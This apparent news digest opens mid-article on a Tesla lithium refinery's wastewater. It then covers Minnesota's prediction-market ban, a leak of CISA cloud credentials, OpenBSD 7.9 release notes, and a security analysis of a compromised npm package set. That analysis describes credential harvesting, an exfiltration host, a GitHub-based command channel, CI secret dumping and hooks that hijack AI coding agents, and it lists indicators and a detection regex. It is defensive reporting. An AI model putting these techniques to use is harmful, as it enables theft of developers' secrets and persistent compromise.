By the time TCEQ closed its in­ves­ti­ga­tion, the drainage dis­trict had al­ready hired its own at­tor­ney and com­mis­sioned its own in­de­pen­dent test. Frank Lazarte, an at­tor­ney rep­re­sent­ing Nueces County Drainage District No. 2, con­tracted Eurofins Environment Testing, an in­ter­na­tion­ally ac­cred­ited en­vi­ron­men­tal lab with a San Antonio fa­cil­ity, to put a sam­pling ma­chine in the ditch for 24 hours and an­a­lyze what it caught. The un­named drainage ditch sits less than a mile up­stream of Tesla’s dis­charge pipe.

The sam­ple was col­lected on April 7. Eurofins is­sued its re­sults on April 10. According to the lab re­port, the 24-hour com­pos­ite found:

Hexavalent chromium at 0.0104 mil­ligrams per liter, just above the lab’s re­port­ing limit of 0.01 mg/​L. Hexavalent chromium is clas­si­fied as a known hu­man car­cino­gen by the US National Toxicology Program. It is the sub­stance the Erin Brockovich case was built around.

Arsenic at 0.0025 mg/​L. That is be­low the fed­eral drink­ing wa­ter stan­dard of 0.01 mg/​L, but pre­sent.

Strontium at 1.17 mg/​L. Mazloum’s tech­ni­cal re­port on the find­ings noted that long-term ex­po­sure can af­fect bone den­sity and kid­ney func­tion in hu­mans and wildlife.

Lithium and vana­dium at con­cen­tra­tions Lazarte’s let­ter de­scribed as ab­nor­mally high rel­a­tive to rain­wa­ter or nor­mal ground­wa­ter.

Elevated lev­els of man­ganese, iron, phos­pho­rus, cal­cium, mag­ne­sium and potas­sium con­sis­tent with in­dus­trial dis­charge. Manganese, a bat­tery process tracer, can have neu­ro­log­i­cal ef­fects at chronic doses. Excess phos­pho­rus can cause al­gae blooms that strip oxy­gen from wa­ter­ways.

Ammonia in the form of ni­tro­gen at 1.68 mg/​L, am­pli­fy­ing the al­gae bloom risk.

Neither hexavalent chromium nor arsenic appears in Tesla’s TCEQ discharge permit as an allowable pollutant. Neither was tested for during TCEQ’s February investigation.

Mazloum, whose technical report has since been distributed to Texas state legislators, describes the lithium signature in the wastewater as a “fingerprint at a crime scene,” and recommends that Tesla design and fund an on-site multi-stage treatment plant using industrial reverse osmosis to strip heavy metals out of the discharge. He has also told the Texas Tribune that the elevated salt content is killing the grass that holds the drainage ditch walls together, with the bare soil washing away in rain and reducing the ditch’s capacity to carry stormwater. Mazloum recommends Robstown residents stay away from the ditch.

Lazarte’s cease-and-desist letter to Tesla’s associate general counsel, sent in mid-April, asked the company to halt wastewater discharge pending a meeting to discuss the lab results. He called the findings “quite disturbing” and wrote that the combination of lithium, strontium and vanadium in the sample “acted like a chemical signature pointing back to the battery processing facility.”

What Tesla says

Tesla disputes the framing. Jason Bevan, Senior Manager of Site Operations at the Robstown plant, said in a written statement that the company “routinely monitors and tests its permitted wastewater discharge” and “remains in complete compliance with all requirements of its state-issued wastewater discharge permit, including applicable water quality standards.” Bevan added that Tesla is “currently reviewing the letter from Nueces County Drainage District #2 and looks forward to working cooperatively with the district to address their concerns.”

Tesla also ar­gues that the Eurofins sam­pling method­ol­ogy was in­ap­pro­pri­ate, be­cause the lab placed its sam­pling equip­ment in the ditch down­stream of the out­fall pipe rather than at the out­fall it­self. The per­mit re­quires mon­i­tor­ing at the out­fall point, and the com­pany has pointed out that ditch sam­ples can pick up con­t­a­m­i­nants from sources that have noth­ing to do with Tesla’s waste­water. This is a real ar­gu­ment, and a court con­sid­er­ing the data will have to weigh it. The drainage dis­tric­t’s re­sponse, as ex­pressed by Lazarte’s let­ter, is that the chem­i­cal fin­ger­print in the sam­ple matches the fa­cil­i­ty’s process, not a ran­dom en­vi­ron­men­tal back­ground.

Notably, no party has al­leged that Tesla is in vi­o­la­tion of any law. TCEQ has not found one. Tesla is op­er­at­ing un­der a per­mit the state agency is­sued. The dis­pute, in­stead, is about what the per­mit was sup­posed to cover, and what got left out of it.

Why South Texas, and why now

The timing is what makes this story sting. Corpus Christi, sixteen miles east of the Tesla refinery, is preparing to declare a water emergency. The city’s reservoirs have been described in public meetings as facing “imminent depletion” if rainfall does not arrive, and emergency water-use restrictions are expected to be enacted in September if conditions do not improve. The state, more broadly, is in the middle of severe drought conditions across most of the affected basins.

The plant in Robstown is sup­posed to be part of the so­lu­tion to the United States’ lithium sup­ply prob­lem. Battery-grade lithium hy­drox­ide is the bot­tle­neck in the do­mes­tic EV bat­tery sup­ply chain that Tesla, Ford, GM and every other US au­tomaker is rac­ing to scale. Tesla’s Robstown fa­cil­ity, if it per­forms at de­sign ca­pac­ity, would be the first ma­jor piece of that sup­ply chain to come fully on­line on US soil. Elon Musk has re­peat­edly cited the re­fin­ery as ev­i­dence that lithium pro­duc­tion does not have to be the dirty, acid-in­ten­sive process it has his­tor­i­cally been every­where else in the world.

That ar­gu­ment now has trace con­cen­tra­tions of hexa­va­lent chromium and el­e­vated lithium sit­ting in a drainage ditch six­teen miles from a coastal city about to ra­tion drink­ing wa­ter. The sub­stances may or may not ex­ceed any in­di­vid­ual reg­u­la­tory thresh­old. The com­bi­na­tion of them, leav­ing a re­fin­ery that was mar­keted as the clean­est in the world, in a county that is run­ning out of wa­ter, is the story.

What an American dri­ver should take away from this

The cease-and-de­sist let­ter has not yet been an­swered. TCEQ has not re­opened its in­ves­ti­ga­tion. Tesla is still op­er­at­ing the plant. The pipe is still dis­charg­ing. None of this is il­le­gal as cur­rently con­sti­tuted, be­cause the per­mit that was writ­ten does not re­quire mon­i­tor­ing for the things the in­de­pen­dent lab found.

What it should do, for any American driver whose next EV is going to be built around domestically refined lithium, is force a real conversation about what “clean lithium” actually means and who gets to define it. Tesla called its process acid-free. The wastewater leaving the facility, on the day Eurofins sampled it, contained a known carcinogen above a detection threshold, an environmental poison below the drinking water standard but present, and abnormally elevated levels of the very metal the plant was built to produce. None of those facts are in dispute. What they mean is.

Minnesota becomes first state to ban prediction markets

www.npr.org

Minnesota has en­acted the most far-reach­ing crack­down on mas­sively pop­u­lar ser­vices like Kalshi and Polymarket.

Steve Karnowski/Associated Press

Minnesota Gov. Tim Walz has signed the na­tion’s first law ban­ning pre­dic­tion mar­ket sites from op­er­at­ing in the state, and in re­sponse, the Trump ad­min­is­tra­tion has sued, tee­ing up a le­gal bat­tle over the most far-reach­ing crack­down on pop­u­lar ser­vices like Kalshi and Polymarket.

It comes as states con­front a grow­ing stand­off with the Trump ad­min­is­tra­tion over how to reg­u­late the in­dus­try, which al­lows peo­ple to bet on vir­tu­ally any­thing.

The new state law makes it a crime to host or ad­ver­tise a pre­dic­tion mar­ket, which it de­fines as a sys­tem that lets con­sumers place a wa­ger on a fu­ture out­come, like sports, elec­tions, live en­ter­tain­ment, some­one’s word choice and world af­fairs.

The pro­hi­bi­tion ex­tends to ser­vices sup­port­ing pre­dic­tion mar­kets, like vir­tual pri­vate net­works, that could al­low con­sumers to dis­guise their lo­ca­tion and get around the ban.

It would force pre­dic­tion mar­ket sites like Kalshi and Polymarket to leave the state, or face pos­si­ble felony charges. The law takes ef­fect in August.

“We as a state should decide how best and what regulations we think should attach to gambling, to protect public safety, to protect our kids,” said Minnesota Rep. Emma Greenman, the Democrat who introduced the measure.

The law has a carve-out for event contracts that serve as an insurance policy in the event of “harm, or loss sustained” and for the purchase of securities and other commodities.

The Commodity Futures Trading Commission’s law­suit seeks to block the law be­fore it starts, ar­gu­ing the pre­dic­tion mar­ket in­dus­try should be ex­clu­sively reg­u­lated by fed­eral of­fi­cials.

“This Minnesota law turns lawful operators and participants in prediction markets into felons overnight,” said CFTC Chairman Michael Selig. “Minnesota farmers have relied on critical hedging products on weather and crop-related events for decades to mitigate their risks. Governor Walz chose to put special interests first and American farmers and innovators last.”

An up­dated ver­sion of the pre­dic­tion mar­ket bill al­lows trad­ing on weather, an ex­cep­tion that fol­lowed push­back from the agri­cul­tural in­dus­try, which has his­tor­i­cally used fu­tures trad­ing on weather as a hedge against storms and other in­clement weather that can af­fect a har­vest. Walz is ex­pected to sign it soon.

Besides Minnesota, bills cracking down on the prediction market industry have been introduced in seven other states, according to the National Conference of State Legislatures. Two of those states, Hawaii and North Carolina, have pending bills seeking to ban the industry statewide.

Experts say the cloud of legal uncertainty hanging over prediction market apps has not slowed their rapid growth.

“The states are using any tactic they can to go after the prediction market companies,” said Melinda Roth, a professor at Washington and Lee University’s School of Law, who studies the industry. “But they’ve embarked on a too big to fail strategy and have become quite mainstream,” she said. “It will be hard to put that genie back in the bottle.”

A legal fight over the Minnesota ban is expected. Questions over whether states or the federal government should oversee the prediction market industry have already triggered more than 20 lawsuits. One of those cases, in Nevada, led to Kalshi pausing its sports betting in the state after a judge found it “indistinguishable” from state-regulated sports gambling.

The Commodity Futures Trading Commission has filed fed­eral law­suits against five states, in­clud­ing Arizona, Wisconsin and New York, at­tempt­ing to over­ride state reg­u­la­tors’ at­tempts to rein in the bet­ting sites.

The CFTC has ar­gued it has ex­clu­sive ju­ris­dic­tion over pre­dic­tion mar­kets, even though for­mer CFTC mem­bers and le­gal ex­perts say bets on foot­ball games, words President Trump might say dur­ing a press con­fer­ence and whether Ricky Martin will make an ap­pear­ance at the Super Bowl are mat­ters far out­side its tra­di­tional scope.

In a statement to NPR, Kalshi spokeswoman Elisabeth Diana said banning prediction markets is a “blatant violation” of the law.

“Minnesota banning prediction markets is like trying to ban the New York Stock Exchange,” said Diana, adding that “this actively harms users because it reduces competition and drives activity offshore.”

A Polymarket spokesman told NPR that Minnesota’s ban runs counter to the federal government’s “established framework” for regulating prediction markets.

Tribal-owned casi­nos op­er­ate in Minnesota, but on­line gam­bling and sports bet­ting are not le­gal in the state.

Prediction markets like Kalshi and Polymarket have given access to sports betting to people in states where the activity is prohibited, since the Trump administration regulates the sites as a type of “event contract,” rather than gambling, which typically is overseen by state gaming authorities.

Nonetheless, sports gambling powers the sites. On Kalshi, for instance, more than 85% of trading activity is related to a sporting event, some of those trades being “parlays,” high-risk wagers that multiple things, points scored, fouls, passes, will all happen.

Bettors on the sites are mak­ing bil­lions of dol­lars in trades every week, even as ques­tions around in­sider trad­ing and how the mar­kets can cre­ate per­verse in­cen­tives for peo­ple to ma­nip­u­late real world out­comes con­tinue to vex the com­pa­nies.

Minnesota Public Radio News re­porters Dana Ferguson and Peter Cox con­tributed re­port­ing to this story.

CISA Admin Leaked AWS GovCloud Keys on Github

krebsonsecurity.com

Until this past week­end, a con­trac­tor for the Cybersecurity & Infrastructure Security Agency (CISA) main­tained a pub­lic GitHub repos­i­tory that ex­posed cre­den­tials to sev­eral highly priv­i­leged AWS GovCloud ac­counts and a large num­ber of in­ter­nal CISA sys­tems. Security ex­perts said the pub­lic archive in­cluded files de­tail­ing how CISA builds, tests and de­ploys soft­ware in­ter­nally, and that it rep­re­sents one of the most egre­gious gov­ern­ment data leaks in re­cent his­tory.

On May 15, KrebsOnSecurity heard from Guillaume Valadon, a re­searcher with the se­cu­rity firm GitGuardian. Valadon’s com­pany con­stantly scans pub­lic code repos­i­to­ries at GitHub and else­where for ex­posed se­crets, au­to­mat­i­cally alert­ing the of­fend­ing ac­counts of any ap­par­ent sen­si­tive data ex­po­sures. Valadon said he reached out be­cause the owner in this case was­n’t re­spond­ing and the in­for­ma­tion ex­posed was highly sen­si­tive.

A redacted screen­shot of the now-de­funct Private CISA repos­i­tory main­tained by a CISA con­trac­tor.

The GitHub repository that Valadon flagged was named “Private-CISA,” and it harbored a vast number of internal CISA/DHS credentials and files, including cloud keys, tokens, plaintext passwords, logs and other sensitive CISA assets.

Valadon said the ex­posed CISA cre­den­tials rep­re­sent a text­book ex­am­ple of poor se­cu­rity hy­giene, not­ing that the com­mit logs in the of­fend­ing GitHub ac­count show that the CISA ad­min­is­tra­tor dis­abled the de­fault set­ting in GitHub that blocks users from pub­lish­ing SSH keys or other se­crets in pub­lic code repos­i­to­ries.

“Passwords stored in plain text in a csv, backups in git, explicit commands to disable GitHub secrets detection feature,” Valadon wrote in an email. “I honestly believed that it was all fake before analyzing the content deeper. This is indeed the worst leak that I’ve witnessed in my career. It is obviously an individual’s mistake, but I believe that it might reveal internal practices.”
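The kind of automated secret scanning Valadon describes can be illustrated with a minimal sketch. This is not GitGuardian's implementation or GitHub's built-in detection; it assumes only the commonly cited shape of AWS access key IDs (an `AKIA` or `ASIA` prefix followed by 16 uppercase letters or digits). The function name and the sample text are hypothetical, and the key shown is a well-known documentation placeholder rather than anything from the leaked repository.

```python
import re

# Assumption: access key IDs look like AKIA/ASIA + 16 uppercase alphanumerics.
# Real scanners use many more patterns plus validity and entropy checks.
AWS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def find_aws_key_ids(text: str) -> list:
    """Return (line_number, match) pairs for strings shaped like AWS key IDs."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in AWS_KEY_ID.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits


# Hypothetical file contents using a documentation placeholder key.
sample = "user,password\naws_access_key_id=AKIAIOSFODNN7EXAMPLE\n"
print(find_aws_key_ids(sample))  # [(2, 'AKIAIOSFODNN7EXAMPLE')]
```

A pattern match like this only flags candidates. Confirming whether a key is live, as Caturegli did, is a separate step.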

One of the exposed files, titled “importantAWStokens,” included the administrative credentials to three Amazon AWS GovCloud servers. Another file exposed in the public GitHub repository, “AWS-Workspace-Firefox-Passwords.csv,” listed plaintext usernames and passwords for dozens of internal CISA systems. According to Philippe Caturegli, founder of the security consultancy Seralys, those systems included one called “LZ-DSO,” which appears short for “Landing Zone DevSecOps,” the agency’s secure code development environment.

Caturegli said he tested the AWS keys only to see whether they were still valid and to determine which internal systems the exposed accounts could access. He said the GitHub account that exposed the CISA secrets exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository.

“The use of both a CISA-associated email address and a personal email address suggests the repository may have been used across differently configured environments,” Caturegli observed. “The available Git metadata alone does not prove which endpoint or device was used.”

The Private CISA GitHub repo ex­posed dozens of plain­text cre­den­tials for im­por­tant CISA GovCloud re­sources.

Caturegli said he validated that the exposed credentials could authenticate to three AWS GovCloud accounts at a high privilege level. He said the archive also includes plain text credentials to CISA’s internal “artifactory” (essentially a repository of all the code packages they are using to build software) and that this would represent a juicy target for malicious attackers looking for ways to maintain a persistent foothold in CISA systems.

“That would be a prime place to move laterally,” he said. “Backdoor in some software packages, and every time they build something new they deploy your backdoor left and right.”

In re­sponse to ques­tions, a spokesper­son for CISA said the agency is aware of the re­ported ex­po­sure and is con­tin­u­ing to in­ves­ti­gate the sit­u­a­tion.

“Currently, there is no indication that any sensitive data was compromised as a result of this incident,” the CISA spokesperson wrote. “While we hold our team members to the highest standards of integrity and operational awareness, we are working to ensure additional safeguards are implemented to prevent future occurrences.”

A review of the GitHub account and its exposed passwords shows the Private CISA repository was maintained by an employee of Nightwing, a government contractor based in Dulles, Va. Nightwing declined to comment, directing inquiries to CISA.

CISA has not re­sponded to ques­tions about the po­ten­tial du­ra­tion of the data ex­po­sure, but Caturegli said the Private CISA repos­i­tory was cre­ated on November 13, 2025. The con­trac­tor’s GitHub ac­count was cre­ated back in September 2018.

The GitHub ac­count that in­cluded the Private CISA repo was taken of­fline shortly af­ter both KrebsOnSecurity and Seralys no­ti­fied CISA about the ex­po­sure. But Caturegli said the ex­posed AWS keys in­ex­plic­a­bly con­tin­ued to re­main valid for an­other 48 hours.

CISA is cur­rently op­er­at­ing with only a frac­tion of its nor­mal bud­get and staffing lev­els. The agency has lost nearly a third of its work­force since the be­gin­ning of the sec­ond Trump ad­min­is­tra­tion, which forced a se­ries of early re­tire­ments, buy­outs, and res­ig­na­tions across the agen­cy’s var­i­ous di­vi­sions.

The now-de­funct Private CISA repo showed the con­trac­tor also used eas­ily-guessed pass­words for a num­ber of in­ter­nal re­sources; for ex­am­ple, many of the cre­den­tials used a pass­word con­sist­ing of each plat­for­m’s name fol­lowed by the cur­rent year. Caturegli said such prac­tices would con­sti­tute a se­ri­ous se­cu­rity threat for any or­ga­ni­za­tion even if those cre­den­tials were never ex­posed ex­ter­nally, not­ing that threat ac­tors of­ten use key cre­den­tials ex­posed on the in­ter­nal net­work to ex­pand their reach af­ter es­tab­lish­ing ini­tial ac­cess to a tar­geted sys­tem.
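The weak pattern described above, a platform name followed by a year, is simple enough to check for mechanically. The sketch below is an illustration under stated assumptions, not a tool used by anyone in this story: the function name, the five-year lookback window and the example platform name are all hypothetical.

```python
from datetime import date
from typing import Iterable, Optional


def is_name_plus_year(platform: str, password: str,
                      years: Optional[Iterable[int]] = None) -> bool:
    """Return True when the password is just the platform name plus a year."""
    if years is None:
        # Assumption: treat the current year and the five before it as guessable.
        this_year = date.today().year
        years = range(this_year - 5, this_year + 1)
    name = platform.strip().lower()
    candidate = password.strip().lower()
    return any(candidate == f"{name}{year}" for year in years)


# "examplewiki" is a made-up platform name used only for illustration.
print(is_name_plus_year("ExampleWiki", "examplewiki2026", years=[2025, 2026]))  # True
print(is_name_plus_year("ExampleWiki", "t7#Lq!vR0p", years=[2025, 2026]))       # False
```

An audit built on a check like this would run against a credential inventory the organization already controls, which is a far safer place to find such passwords than a public repository.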

“What I suspect happened is [the CISA contractor] was using this GitHub to synchronize files between a work laptop and a home computer, because he has regularly committed to this repo since November 2025,” Caturegli said. “This would be an embarrassing leak for any company, but it’s even more so in this case because it’s CISA.”

OpenBSD 7.9

www.openbsd.org

7.9 Song: “Diamond in the Rough”. Artwork by Lyra Henderson.

See the in­for­ma­tion on the FTP page for a list of mir­ror ma­chines.

Go to the pub/OpenBSD/7.9/ directory on one of the mirror sites.

Have a look at the 7.9 er­rata page for a list of bugs and workarounds.

See a de­tailed log of changes be­tween the 7.8 and 7.9 re­leases.

signify(1) pubkeys for this release:

openbsd-79-base.pub:

RWTSdNN9A3yvWNn7mUjXwv9DOCOUnyfuV+mq1iGPIfD+NhN8EYnEQ1at

openbsd-79-fw.pub:

RWQdmBb/OCe1hXE08xCj5VLnBpGpphy7kYPdU3oWyfnrwswjtl8K385E

openbsd-79-pkg.pub:

RWSw1kDLJJy6OYgnayEMReLV57z2rzx5jYNCghO+2ARwqd6KuwGFWSn7

openbsd-79-syspatch.pub:

RWTJmz/ur68S9e26/JVRr7T88lAPZIF3YgZ3w2lDnf/frAxTerC/DrZ6

All applicable copyrights and credits are in the src.tar.gz, sys.tar.gz, xenocara.tar.gz, ports.tar.gz files, or in the files fetched via ports.tar.gz.

What’s New

This is a par­tial list of new fea­tures and sys­tems in­cluded in OpenBSD 7.9. For a com­pre­hen­sive list, see the changelog lead­ing to 7.9.

Platform-specific im­prove­ments:

arm64:

Enabled ice(4) on arm64.

Added support for the RK3588 and RK3576 SoCs with new or additions to existing drivers.

Added support for the Genesys Logic GL9755 SDHC controller (which includes the SDHC controller on some of the Apple Silicon laptops) to sdmmc(4).

amd64:

Added SMU support to amdpmc(4). The SMU is a microcontroller buried deep in the bowels of AMD SoCs and needs to be tickled in order to reach the lowest power states in suspend.

Disabled Panel Self Refresh (PSR) in amdgpu to avoid a potential hang on a ThinkPad X13 gen 6.

Increased MAXCPUs on amd64 to 255.

On amd64, we now zero the DM PTE/PDE pages before use. This fixes a bug on machines with more than 512GB RAM.

Mitigated floating point state leakage observed on AMD Zen/Zen+ (Zen 1).

luna88k:

Switched luna88k compiler to gcc4.

Switched luna88k to PIE (Position Independent Executables) by default.

riscv64: Systems with a SpacemiT K1 SoC gained support with the following (and more) changes:

Added smtclock(4), a driver for the clock/reset controller on the SpacemiT K1 SoC.

Added many more drivers to support the SpacemiT K1 SoC.

Implemented support for the Zicbom (Cache-Block Management) and Svpbmt (Page-Based Memory Types) extensions.

Added the SpacemiT K1 device trees onto the riscv64 miniroot making them accessible during installation.

Made “Instruction access fault” (EXCP_FAULT_FETCH) traps being treated as PROT_EXEC. This fixes random SIGSEGV on the SpacemiT X60 cores.

Added SpacemiT K1 support to dwpcie(4).

Other architectures:

Fixed various errors on big-endian systems in ice(4) to make it work on sparc64.

Changed powerpc64 memory barriers to “sync”.

Reworked and improved TLB shootdown on alpha.

Hoisted mips64 CPU accounting to get multiple softnet threads on MP systems.

Made sure to initialize all FPU registers on sparc64 to all 1 (or -NaN), and not only the lower 32 registers.

Fixed parking mutex on sun4u sparc64 cpus.

More plat­form-spe­cific changes can be found in the hard­ware sup­port sec­tion be­low.

Various ker­nel im­prove­ments:

Introduced a mechanism to manage CPU cores with different speeds in the scheduler. The sysctl(8) variable “hw.blockcpu” takes a sequence of 4 letters: S (for SMT), P (regular performance CPU), E (efficient CPU, generally 80% to 50% as fast), and L (lethargic CPU) which are even slower. Set this to select CPUs to kick out of the scheduler (SL by default). Currently works on amd64 and arm64.

Replaced the cas spinlock in kernel mutexes with a “parking” lock.

Stopped forcing the page daemon to sleep when there are outstanding paging requests.

Implemented a ddb(4) stop command that sends a SIGSTOP to the specified pid.

Made ddb(4) output visible when entering ddb from X on amdgpu.

Added infrastructure to allow future support of up to 52 partitions per disk.

Made changes to avoid memory allocation from within the swapencrypt path of the pagedaemon by pre-allocating 32 swapclusters up-front.

Changed the strategy by which the pagedaemon creates free memory by overshooting the creation of inactive and free pages, in order to defragment memory.

Refuse to load a binary without a PT_LOAD exec segment.

Suspend/Hibernate Support:

Implemented delayed hibernation: In order to prevent running out of battery while suspended, this feature wakes up a suspended system after a configurable time to then immediately perform a hibernation. The machdep.hibernatedelay sysctl(2) is used to configure the number of seconds after which the system will wake up from suspend and hibernate itself.

SMP Improvements:

Unlocked socket splicing.

Unlocked icmp6_sysctl().

Unlocked the IGMP slow timeout.

Enabled parallel fault handling on amd64 and arm64.

Made bse(4) interrupts mp-safe.

Protected the IGMP and MLD6 fast timers with an rwlock.

Direct Rendering Manager and graph­ics dri­vers:

Updated drm(4) to Linux 6.18.22.

VMM/VMD and vir­tu­al­iza­tion im­prove­ments:

Adopted PCI-based semantics for reading unsupported or invalid registers by returning all 1’s. Newer Linux kernels have started using 128-bit feature spaces.

Added sysctl(8) machdep.vmmode to indicate status as a host or guest (and SEV mode).

Added vmboot, a tiny kernel that allows sysupgrade(8) to work for vmd(8) VMs.

Allowed cd(4)/vioscsi(4) on a VM to use confidential computing methods, e.g. AMD SEV.

Fixed a segfault in vmd(8) during vmmci timeout firing.

Enabled 32-bit direct kernel launch for both amd64 and i386 in vmd(8).

Fixed a race in vmd(8) vm pause barrier usage.

Fixed a race in vmm(4) vm termination path.

Added emulation of AMD SysCfg MSR in vmm(4).

Made OpenBSD work on Apple Virtualization.

Only expose pvclock(4) in vmm(4) if tsc frequency is known.

Reduced vmd(8) lowmem area in the memory map to help Linux guest reboot issues.

Prevented vmd(8) pause deadlock when vcpu doesn’t halt.

Fixed timer emulation-related OpenBSD-i386 VM hangs when using the i8254 hardware timecounter with vmm(4).

Made vio(4) recover from missed RX interrupts.

Fixed vmd(8) vionet reset race leading to broken networking.

Mini Shai-Hulud Strikes Again: 317 npm Packages Compromised

safedep.io

SafeDep Team

• May 19, 2026 • 28 min read

TL;DR

The npm account atool ([email protected]) was compromised on May 19, 2026. The attacker published 637 malicious versions across 317 packages in a 22-minute automated burst. Affected packages include size-sensor (4.2M downloads/month), echarts-for-react (3.8M), @antv/scale (2.2M), timeago.js (1.15M), and hundreds of @antv scoped packages.

The payload is a 498KB obfuscated Bun script that matches the Mini Shai-Hulud toolkit used in the SAP compromise three weeks earlier: same scanner architecture, same credential regex set, same obfuscation pattern. It harvests credentials across the full AWS chain (env vars, config files, EC2 IMDS, ECS container metadata, Secrets Manager), Kubernetes service account tokens, HashiCorp Vault, GitHub PATs, npm tokens, SSH keys, and local password manager vaults (1Password, Bitwarden, pass, gopass).

Stolen data is exfiltrated through two parallel channels: Git objects committed to public GitHub repositories created under the compromised token (User-Agent forged as python-requests/2.31.0), and RSA+AES encrypted HTTPS POSTs to t.m-kosche[.]com disguised as OpenTelemetry trace data.

In CI environments, the payload exchanges GitHub Actions OIDC tokens for npm publish tokens, signs artifacts via Sigstore (Fulcio + Rekor) using the stolen identity, and injects persistence into .github/workflows/codeql.yml. The payload hijacks Claude Code and Codex by injecting SessionStart hooks that re-execute the malware on every AI session, both locally and via commits to accessible GitHub repositories. VS Code gets a tasks.json with "runOn": "folderOpen" for the same effect.

A persistent systemd service / macOS LaunchAgent (kitty-monitor) installs a GitHub dead-drop C2 backdoor: a Python daemon that polls GitHub's commit search API hourly for RSA-PSS signed commands in commit messages containing the keyword firedalazer, then downloads and executes arbitrary Python from the signed URL. A separate gh-token-monitor daemon polls stolen GitHub tokens at 60-second intervals. The payload also attempts Docker container escape via the host socket and propagates infection to other local Node.js projects.

The at­tack uses two ex­e­cu­tion paths. Each com­pro­mised ver­sion adds a pre­in­stall hook (bun run in­dex.js). 630 of 637 ver­sions also in­ject an op­tion­alDe­pen­den­cies en­try point­ing to im­poster com­mits in the antvis/​G2 GitHub repos­i­tory. These are or­phan com­mits with forged au­thor­ship, in­vis­i­ble in the re­po’s branch his­tory, ex­ploit­ing GitHub’s fork ob­ject shar­ing to host a sec­ond copy of the pay­load with­out any write ac­cess to the tar­get repos­i­tory. npm’s github: de­pen­dency res­o­lu­tion fetches and ex­e­cutes the con­tent by SHA.

Impact:

Projects us­ing semver ranges (e.g., ^3.0.6 for echarts-for-re­act) auto-re­solve to com­pro­mised ver­sions

Credential har­vest­ing tar­gets npm to­kens, GitHub PATs, AWS keys (full cre­den­tial chain in­clud­ing EC2 meta­data and ECS con­tainer cre­den­tials), GCP ser­vice ac­counts, Azure cre­den­tials, data­base con­nec­tion strings, Stripe keys, Slack to­kens, SSH keys, Docker auth, Kubernetes ser­vice ac­count to­kens, HashiCorp Vault to­kens, and lo­cal pass­word man­ager vaults (1Password, Bitwarden, pass, gopass)

Dual ex­fil­tra­tion: stolen data is com­mit­ted as Git ob­jects to pub­lic GitHub repos­i­to­ries (User-Agent python-re­quests/​2.31.0) and sent as RSA+AES en­crypted HTTPS POSTs to hxxps://​t.m-kosche[.]com/​api/​pub­lic/​otel/​v1/​traces (disguised as OpenTelemetry traces)

npm OIDC to­ken ex­change in CI al­lows the at­tacker to ob­tain pub­lish to­kens us­ing the pipeline’s own iden­tity

Sigstore sign­ing with stolen OIDC to­kens cre­ates le­git­i­mately-signed ar­ti­facts with forged prove­nance

Docker socket ac­cess en­ables priv­i­leged con­tainer es­cape with host filesys­tem bind mounts

CI/CD persistence via .github/workflows/codeql.yml injection (named "Run Copilot") that dumps toJSON(secrets) as a GitHub Actions artifact, then self-cleans by deleting the workflow run and resetting the branch

AI agent hijacking: Claude Code SessionStart hooks, Codex hooks, and VS Code "runOn": "folderOpen" tasks, all triggering a Bun bootstrapper that re-executes the payload

Persistent sys­temd user ser­vices and ma­cOS LaunchAgents: kitty-mon­i­tor runs a GitHub dead-drop C2 back­door that ac­cepts RSA-signed re­mote com­mands via GitHub com­mit search; gh-to­ken-mon­i­tor polls stolen to­kens at 60-second in­ter­vals

Local pro­ject in­fec­tion copies pay­load files and hooks into other Node.js pro­jects on the same ma­chine

Redundant pay­load de­liv­ery via GitHub im­poster com­mits sur­vives even if pre­in­stall hooks are blocked

Indicators of Compromise (IoC):

Any package published by atool ([email protected]) on 2026-05-19 between 01:44 and 02:06 UTC

pre­in­stall script: bun run in­dex.js

Payload SHA256: a68d­d1e6a6e35ec3771e1f94fe796f55d­fe65a2b94560516f­f4ac189390d­fa1c

Imposter commits in antvis/G2 (orphan, forged author, message: "New Package"):

1916faa365f2788b6e193514872d51a242876569 (626 ver­sions)

7cb42f57561c321ecb09b4552802ae0ac55b3a7a (2 ver­sions)

dc3d62a2181be­b9f326952a2d212900c94f2e13d (1 ver­sion, garbage col­lected)

Optional de­pen­dency: @antv/setup: github:antvis/​G2#<com­mit-sha>

Exfiltration repositories matching the Dune-themed naming pattern {word1}-{word2}-{number}, where word1 is one of: sardaukar, mentat, fremen, atreides, harkonnen, gesserit, prescient, fedaykin, tleilaxu, siridar, kanly, sayyadina, ghola, powindah, prana, kralizec; word2 is one of: sandworm, ornithopter, heighliner, stillsuit, lasgun, sietch, melange, thumper, navigator, fedaykin, futar, phibian, slig, cogitor, laza, ghola; number is 0-999. Description: "Shai-Hulud: Here We Go Again" (reversed in source)

HTTPS ex­fil­tra­tion to hxxps://​t.m-kosche[.]com/​api/​pub­lic/​otel/​v1/​traces (RSA+AES en­crypted, dis­guised as OpenTelemetry traces)

HTTP re­quests to 169.254.169.254 (EC2 meta­data) and 169.254.170.2 (ECS con­tainer meta­data)

Branches named chore/​add-cod­eql-sta­tic-analy­sis in repos­i­to­ries ac­ces­si­ble to com­pro­mised to­kens

.github/workflows/codeql.yml with work­flow name Run Copilot that dumps to­J­SON(se­crets) to for­mat-re­sults.txt

.claude/settings.json con­tain­ing SessionStart hooks run­ning node .claude/setup.mjs

.vscode/tasks.json with "runOn": "folderOpen" tasks calling .claude/setup.mjs

.claude/setup.mjs or .vscode/setup.mjs (Bun boot­strap­per, down­loads bun v1.3.14 from GitHub)

Systemd user ser­vice kitty-mon­i­tor.ser­vice or LaunchAgent com.user.kitty-mon­i­tor.plist

gh-to­ken-mon­i­tor dae­mon at ~/.local/bin/gh-token-monitor.sh

Files at ~/.local/share/kitty/cat.py (GitHub dead-drop C2 back­door)

State file /var/tmp/.gh_update_state (C2 ex­e­cu­tion track­ing)

GitHub com­mits con­tain­ing the key­word firedalazer (C2 com­mand trig­ger)

RSA-PSS signed com­mands in com­mit mes­sages: firedalazer <base64_url>.<base64_signature>
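The repository naming pattern in the indicator list above lends itself to a quick filter over an organization's or user's repository names. The following is a minimal sketch, not a tool from the original analysis: the function name `isSuspectRepoName` is hypothetical, the word lists are copied from the indicator above, and it assumes the number is written as one to three decimal digits (the source only states the range 0-999).

```javascript
// Word lists copied from the naming-pattern indicator above.
const WORD1 = [
  'sardaukar', 'mentat', 'fremen', 'atreides', 'harkonnen', 'gesserit',
  'prescient', 'fedaykin', 'tleilaxu', 'siridar', 'kanly', 'sayyadina',
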